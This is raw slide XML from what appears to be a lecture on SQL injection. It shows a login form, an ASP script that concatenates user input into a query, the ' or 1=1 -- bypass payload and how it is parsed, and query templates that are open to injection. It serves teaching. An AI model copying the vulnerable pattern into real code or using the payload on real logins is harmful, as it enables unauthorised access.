              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;table&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;td&gt;Username:&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      &lt;td&gt;&lt;input type="text" name="username"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;td&gt;Password:&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      &lt;td&gt;&lt;input type=password name="password"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/table&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" value="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="reset" value="Reset"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9114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083">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208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208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208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208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208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208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4208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4208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42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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Login Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;% function Login( connection ) {</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username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Request.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("username");</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password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Request.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("password");</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Server.CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ADODB.Recordset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = "select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pubs.guest.sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>             where username = '" + username + "' and \ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>             password = '" + password + "'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, connection); //perform query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso.EOF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) //if record set empty, deny access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>     { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rso.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %&gt;  &lt;center&gt;ACCESS DENIED&lt;/center&gt; &lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    } else  { //else grant access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %&gt;  &lt;center&gt;ACCESS GRANTED&lt;/center&gt; &lt;% </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    // do stuff here ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10545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4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4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4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4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4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4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41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413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413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44131">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4131">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413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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="946179" name="Picture 3" descr="database"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1660525" y="1220788"/>
            <a:ext cx="5822950" cy="4416425"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21166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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The [' or 1=1 --] Technique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948229" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Given the SQL query string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pubs.guest.sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      where username = '" + username + "' and \</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      password = '" + password + "'";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By entering:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' or 1=1 --</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as the user name (and any password) results in the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> where username='' or 1=1 --' and password= ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Parsed by the SQL server as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> username='' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' and password= ''</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The conditional statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>username ='' or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is true whether or not username is equal to ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The "--" makes sure that the rest of the SQL statement is interpreted as a comment and therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>password =''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not evaluated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8560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8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82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2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82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82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82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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injecting SQL Into Different Types of Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection can modify any type of query such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM accounts WHERE user=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ AND pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT INTO accounts (user, pass) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VALUES(‘${u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’, ‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that in this case one has to figure out how many values to insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE accounts SET pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ WHERE user= ‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ AND pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE * FROM accounts WHERE user=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122309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3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3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32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32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32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Inject Different Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
